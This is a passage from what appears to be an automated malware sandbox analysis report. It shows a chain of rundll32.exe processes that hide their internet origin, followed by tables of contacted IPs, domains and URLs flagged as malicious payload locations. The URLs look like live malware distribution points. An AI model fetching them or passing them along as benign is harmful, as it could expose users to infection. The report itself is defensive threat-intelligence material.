25->27         started        process10 29 rundll32.exe 2 27->29         started        signatures11 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->64 32 rundll32.exe 29->32         started        process12 process13 34 rundll32.exe 1 32->34         started        signatures14 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->60 37 rundll32.exe 34->37         started        process15 process16 39 rundll32.exe 1 37->39         started        signatures17 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 39->62 42 rundll32.exe 39->42         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.88.166
 unknown United States
13335 CLOUDFLARENETUS true
192.0.78.20
 unknown United States
2635 AUTOMATTICUS true
45.138.97.75
 unknown Germany
9009 M247GB true
212.227.200.73
 unknown Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
172.217.6.174
 unknown United States
15169 GOOGLEUS true

Contacted Domains

Name IP Active
shop.nowfal.dev 104.21.88.166 true
traumfrauen-ukraine.de 212.227.200.73 true
e-wdesign.eu 45.138.97.75 true
nightlifemumbai.club 172.217.6.174 true
jflmktg.wpcomstaging.com 192.0.78.20 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://nightlifemumbai.club/x/0wBD3/ true
  • Avira URL Cloud: malware
 unknown
http://traumfrauen-ukraine.de/bin/JyeS/ true
  • Avira URL Cloud: safe
 unknown
http://e-wdesign.eu/wp-content/bn1IgDejh/ true
  • Avira URL Cloud: safe
 unknown